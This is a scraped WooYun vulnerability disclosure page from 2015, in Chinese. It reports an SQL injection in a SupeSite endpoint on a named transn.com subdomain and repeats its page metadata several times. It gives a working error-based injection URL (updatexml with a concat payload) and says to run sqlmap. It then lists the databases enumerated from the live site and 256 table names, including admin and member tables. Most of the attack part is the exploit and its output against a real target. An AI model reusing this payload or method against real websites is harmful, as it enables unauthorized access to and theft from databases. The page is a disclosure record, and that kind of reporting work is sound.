传神某站点SQL注射（涉及7库） | wooyun-2015-0134543| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134543

漏洞标题：传神某站点SQL注射（涉及7库）

漏洞作者：路人甲

提交时间：2015-08-17 11:17

修复时间：2015-08-22 11:18

公开时间：2015-08-22 11:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-17：细节已通知厂商并且等待厂商处理中
2015-08-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

supesit batch.common.php

http://cat.transn.com/batch.common.php?action=modelquote&cid=1&name=members%20where%201=1%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(521521)),0x5e24),1))%23

直接sqlmap走起。

漏洞证明：

--dbs

available databases [7]:
[*] icatweb
[*] information_schema
[*] tcatwebsite
[*] test
[*] test_entwcat
[*] test_translib
[*] test_wattapi

--tables -D "icatweb"

Database: icatweb
[256 tables]
+-------------------------+
| [Table]access           |
| [Table]activities       |
| [Table]activityapplies  |
| [Table]addons           |
| [Table]adminactions     |
| [Table]admincustom      |
| [Table]admingroups      |
| [Table]adminnotes       |
| [Table]adminsession     |
| [Table]adminsessions    |
| [Table]ads              |
| [Table]advertisements   |
| [Table]announcements    |
| [Table]attachmentfields |
| [Table]attachments      |
| [Table]attachmenttypes  |
| [Table]attachpaymentlog |
| [Table]attachtypes      |
| [Table]banned           |
| [Table]bbcodes          |
| [Table]blocks           |
| [Table]cache_0          |
| [Table]cache_1          |
| [Table]cache_2          |
| [Table]cache_3          |
| [Table]cache_4          |
| [Table]cache_5          |
| [Table]cache_6          |
| [Table]cache_7          |
| [Table]cache_8          |
| [Table]cache_9          |
| [Table]cache_a          |
| [Table]cache_b          |
| [Table]cache_c          |
| [Table]cache_d          |
| [Table]cache_e          |
| [Table]cache_f          |
| [Table]cache            |
| [Table]caches           |
| [Table]categories       |
| [Table]channels         |
| [Table]click            |
| [Table]clickgroup       |
| [Table]clickuser        |
| [Table]creditlog        |
| [Table]creditrule       |
| [Table]creditslog       |
| [Table]crons            |
| [Table]customfields     |
| [Table]debateposts      |
| [Table]debates          |
| [Table]failedlogins     |
| [Table]faqs             |
| [Table]favoriteforums   |
| [Table]favorites        |
| [Table]favoritethreads  |
| [Table]feeds            |
| [Table]forumfields      |
| [Table]forumlinks       |
| [Table]forumrecommend   |
| [Table]forums           |
| [Table]friendlinks      |
| [Table]imagetypes       |
| [Table]invites          |
| [Table]itempool         |
| [Table]magiclog         |
| [Table]magicmarket      |
| [Table]magics           |
| [Table]medallog         |
| [Table]medals           |
| [Table]memberfields     |
| [Table]membermagics     |
| [Table]memberrecommend  |
| [Table]members          |
| [Table]memberspaces     |
| [Table]modelcolumns     |
| [Table]modelfolders     |
| [Table]modelinterval    |
| [Table]models           |
| [Table]moderators       |
| [Table]modworks         |
| [Table]mytasks          |
| [Table]navs             |
| [Table]onlinelist       |
| [Table]onlinetime       |
| [Table]orders           |
| [Table]pages            |
| [Table]paymentlog       |
| [Table]pluginhooks      |
| [Table]plugins          |
| [Table]pluginvars       |
| [Table]polloptions      |
| [Table]polls            |
| [Table]postitems        |
| [Table]postlog          |
| [Table]postmessages     |
| [Table]postposition     |
| [Table]posts            |
| [Table]postset          |
| [Table]prefields        |
| [Table]profilefields    |
| [Table]projects         |
| [Table]promotions       |
| [Table]prompt           |
| [Table]promptmsgs       |
| [Table]prompttype       |
| [Table]ranks            |
| [Table]ratelog          |
| [Table]regips           |
| [Table]relatedthreads   |
| [Table]reportlog        |
| [Table]reports          |
| [Table]request          |
| [Table]rewardlog        |
| [Table]robotitems       |
| [Table]robotlog         |
| [Table]robotmessages    |
| [Table]robots           |
| [Table]rss              |
| [Table]rsscaches        |
| [Table]searchindex      |
| [Table]sessions         |
| [Table]settings         |
| [Table]sitemaplogs      |
| [Table]smilies          |
| [Table]spacecaches      |
| [Table]spacecomments    |
| [Table]spaceitems       |
| [Table]spacenews        |
| [Table]spacepages       |
| [Table]spacetags        |
| [Table]stats            |
| [Table]statvars         |
| [Table]styles           |
| [Table]stylevars        |
| [Table]survey           |
| [Table]tagcache_d       |
| [Table]tagcache         |
| [Table]tags             |
| [Table]tasks            |
| [Table]taskvars         |
| [Table]templates        |
| [Table]threads          |
| [Table]threadsmod       |
| [Table]threadtags       |
| [Table]threadtypes      |
| [Table]tradecomments    |
| [Table]tradelog         |
| [Table]tradeoptionvars  |
| [Table]trades           |
| [Table]typemodels       |
| [Table]typeoptions      |
| [Table]typeoptionvars   |
| [Table]typevars         |
| [Table]usergroups       |
| [Table]userlog          |
| [Table]validating       |
| [Table]warnings         |
| [Table]words            |
| uc_admins               |
| uc_applications         |
| uc_badwords             |
| uc_domains              |
| uc_failedlogins         |
| uc_feeds                |
| uc_friends              |
| uc_mailqueue            |
| uc_memberfields         |
| uc_members              |
| uc_mergemembers         |
| uc_newpm                |
| uc_notelist             |
| uc_pms                  |
| uc_protectedmembers     |
| uc_settings             |
| uc_sqlcache             |
| uc_tags                 |
| uc_vars                 |
| uchome_ad               |
| uchome_adminsession     |
| uchome_album            |
| uchome_appcreditlog     |
| uchome_blacklist        |
| uchome_block            |
| uchome_blog             |
| uchome_blogfield        |
| uchome_cache            |
| uchome_class            |
| uchome_click            |
| uchome_clickuser        |
| uchome_comment          |
| uchome_config           |
| uchome_creditlog        |
| uchome_creditrule       |
| uchome_cron             |
| uchome_data             |
| uchome_docomment        |
| uchome_doing            |
| uchome_event            |
| uchome_eventclass       |
| uchome_eventfield       |
| uchome_eventinvite      |
| uchome_eventpic         |
| uchome_feed             |
| uchome_friend           |
| uchome_friendguide      |
| uchome_friendlog        |
| uchome_invite           |
| uchome_log              |
| uchome_magic            |
| uchome_magicinlog       |
| uchome_magicstore       |
| uchome_magicuselog      |
| uchome_mailcron         |
| uchome_mailqueue        |
| uchome_member           |
| uchome_mtag             |
| uchome_mtaginvite       |
| uchome_myapp            |
| uchome_myinvite         |
| uchome_notification     |
| uchome_pic              |
| uchome_picfield         |
| uchome_poke             |
| uchome_poll             |
| uchome_pollfield        |
| uchome_polloption       |
| uchome_polluser         |
| uchome_post             |
| uchome_profield         |
| uchome_profilefield     |
| uchome_report           |
| uchome_session          |
| uchome_share            |
| uchome_show             |
| uchome_space            |
| uchome_spacefield       |
| uchome_spaceinfo        |
| uchome_spacelog         |
| uchome_stat             |
| uchome_statuser         |
| uchome_tag              |
| uchome_tagblog          |
| uchome_tagspace         |
| uchome_task             |
| uchome_thread           |
| uchome_topic            |
| uchome_topicuser        |
| uchome_userapp          |
| uchome_userappfield     |
| uchome_userevent        |
| uchome_usergroup        |
| uchome_userlog          |
| uchome_usermagic        |
| uchome_usertask         |
| uchome_visitor          |
+-------------------------+

修复方案：

我是来找礼物的！

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-08-22 11:18

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134543

漏洞标题：传神某站点SQL注射（涉及7库）

相关厂商：transn.com

漏洞作者：路人甲

提交时间：2015-08-17 11:17

修复时间：2015-08-22 11:18

公开时间：2015-08-22 11:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134543

漏洞标题：传神某站点SQL注射（涉及7库）

相关厂商：transn.com

漏洞作者： 路人甲

提交时间：2015-08-17 11:17

修复时间：2015-08-22 11:18

公开时间：2015-08-22 11:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0134543"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云